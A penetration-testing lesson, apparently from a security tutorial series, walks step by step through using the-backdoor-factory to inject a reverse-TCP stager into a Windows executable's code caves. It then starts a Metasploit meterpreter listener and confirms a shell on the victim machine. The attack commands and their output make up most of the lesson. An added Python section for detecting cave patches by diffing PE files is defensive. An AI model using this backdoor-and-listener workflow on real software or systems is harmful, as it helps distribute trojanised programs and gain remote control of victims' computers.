# Lesson 9: Tool Introduction - the-backdoor-factory

Project address: <https://github.com/secretsquirrel/the-backdoor-factory>

## Principle

Executable binaries contain large runs of 00 bytes that hold no data (code caves). These bytes are replaced with the payload, and when the program runs a jmp into that code triggers the payload.

## Example: the weighbridge system from the project

```bash
root@John:~/Desktop# git clone https://github.com/secretsquirrel/the-backdoor-factory.git
# install the-backdoor-factory
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnlYRh7H5h-1bIk%2Fbaa5f2ef8bc4b8332d377e179c2897d1.jpg?generation=1551060452382777\&alt=media)

```bash
root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -S
# check whether the binary supports backdoor injection
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnnxPf0wWxDOnLf%2F65f5db4ee779eaacdff8a20bdfd35ea8.jpg?generation=1551060446680834\&alt=media)

```bash
root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -c -l 150
# test for a code cave of size 150
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnpUH0ApLUgJIe7%2F2b8e42c3fe1195f37bf7b01fb31af21b.jpg?generation=1551060438052523\&alt=media)

```bash
root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -s show
# list the available payloads
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnrdey7Kfb796h2%2Fc576aabd967bcbbf39467dcf40ec2759.jpg?generation=1551060449053503\&alt=media)

```bash
root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -H 192.168.1.111 -P 8080 -s iat_reverse_tcp_stager_threaded
# insert the payload and generate the file
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqntGvelhg1wyy0N%2F1dbc7c753b5135a67db8ac3bee6f3352.jpg?generation=1551060428696462\&alt=media)

```bash
root@John:~/Desktop/the-backdoor-factory# md5sum ./guobang.exe /root/demo/guobang.exe
# compare the MD5 of the original file and the generated file
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnv6TkhNpnFTwb9%2F999c8d02e798b61f61a4d8cd284ffd0b.jpg?generation=1551060459847276\&alt=media)

```bash
root@John:~/Desktop/the-backdoor-factory# du -k ./guobang.exe /root/demo/guobang.exe
# compare the file sizes
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnxzQX0sIVWLXIz%2Fedd13750f6b3e03121e63e805b4a5b97.jpg?generation=1551060427458627\&alt=media)
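The md5sum and du checks above show the signature of a cave patch: the hash changes while the file size does not. The following Python is an added example, not code from this lesson or from the-backdoor-factory; it parses the PE section table, lists every byte span that differs between an original and a patched image, and flags whether each span sat in a null-byte cave of the original and whether it covers the entry point. The one-section PE and the 0xCC stand-in bytes are constructed for the demo; all function names are the example's own.

```python
import struct
# Added example, not the-backdoor-factory's code; build_sample() constructs the PE used below.
def pe_layout(data):
    """(AddressOfEntryPoint, [(name, virt_addr, raw_off, raw_size), ...]) from the PE headers."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]                     # e_lfanew
    assert data[pe:pe + 4] == b"PE\0\0", "not a PE image"
    nsec, opt_size = (struct.unpack_from("<H", data, pe + o)[0] for o in (6, 20))
    entry = struct.unpack_from("<I", data, pe + 24 + 16)[0]          # optional header + 16
    secs = [struct.unpack_from("<8s4I", data, pe + 24 + opt_size + 40 * k) for k in range(nsec)]
    return entry, [(n.rstrip(b"\0").decode(), va, roff, rs) for n, _, va, rs, roff in secs]

def in_null_run(data, off, min_len):
    """True if data[off] is a zero byte inside a run of at least min_len zeros (a cave)."""
    lo, hi = off, off
    while lo > 0 and data[lo - 1] == 0: lo -= 1
    while hi < len(data) and data[hi] == 0: hi += 1
    return hi > off and hi - lo >= min_len

def diff_report(orig, patched, min_cave=150):
    """Changed spans between two same-size images, with section and cave status."""
    assert len(orig) == len(patched), "sizes differ: not a cave-only patch"
    entry, secs = pe_layout(orig)
    entry_off = next((roff + entry - va for _, va, roff, rs in secs if va <= entry < va + rs), None)
    spans, i = [], 0
    while i < len(orig):
        if orig[i] != patched[i]:
            j = i
            while j < len(orig) and orig[j] != patched[j]: j += 1
            sec = next((n for n, _, roff, rs in secs if roff <= i < roff + rs), "<header>")
            spans.append({"offset": i, "length": j - i, "section": sec,
                          "was_cave": in_null_run(orig, i, min_cave),
                          "hits_entry": entry_off is not None and i <= entry_off < j})
            i = j
        else:
            i += 1
    return spans

def build_sample():
    """Constructed PE32 with one .text section: 16 'code' bytes, then zeros (a cave)."""
    pe, toff, tsize, tva = 0x40, 0x200, 0x400, 0x1000
    hdr = bytearray(toff)
    hdr[0:2], hdr[pe:pe + 4] = b"MZ", b"PE\0\0"
    for off, fmt, val in ((0x3C, "<I", pe), (pe + 6, "<H", 1), (pe + 20, "<H", 0xE0), (pe + 40, "<I", tva)):
        struct.pack_into(fmt, hdr, off, val)   # e_lfanew, NumberOfSections, SizeOfOptionalHeader, entry
    struct.pack_into("<8s4I", hdr, pe + 24 + 0xE0, b".text", tsize, tva, tsize, toff)
    orig = bytes(hdr) + bytes(range(1, 17)) + bytes(tsize - 16)
    patched = bytearray(orig)                  # same size: 0xCC stand-in bytes fill the cave,
    patched[toff + 0x100:toff + 0x100 + 200] = b"\xcc" * 200            # and the entry point
    patched[toff:toff + 5] = b"\xe9" + struct.pack("<i", 0x100 - 5)     # becomes a jmp to it
    return orig, bytes(patched)
```

Running `diff_report(*build_sample())` reports two spans in `.text`: a 5-byte change covering the entry point and a 200-byte change inside a former cave, which is the pattern the equal-size, different-hash comparison hints at but cannot locate.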

```bash
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.111
lhost => 192.168.1.111
msf exploit(handler) > set lport 8080
lport => 8080
msf exploit(handler) > exploit -j
# start the local listener
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnzy9cnLFdBVB1e%2F94330fb03737c7e42549f1b9b3a8bb21.jpg?generation=1551060430698791\&alt=media)

Open the program:

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqo05ZzWWs26q4qv%2F2139e4a1c0c1e326605cf246742ff3a5.jpg?generation=1551060429432002\&alt=media)

```bash
meterpreter > getuid
Server username: John-PC\John
```

Confirm the target:

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqo2xVp9DZANqk1m%2F613afd4b9343cfd43965aa934b71cc48.jpg?generation=1551060439309972\&alt=media)

--By Micropoor
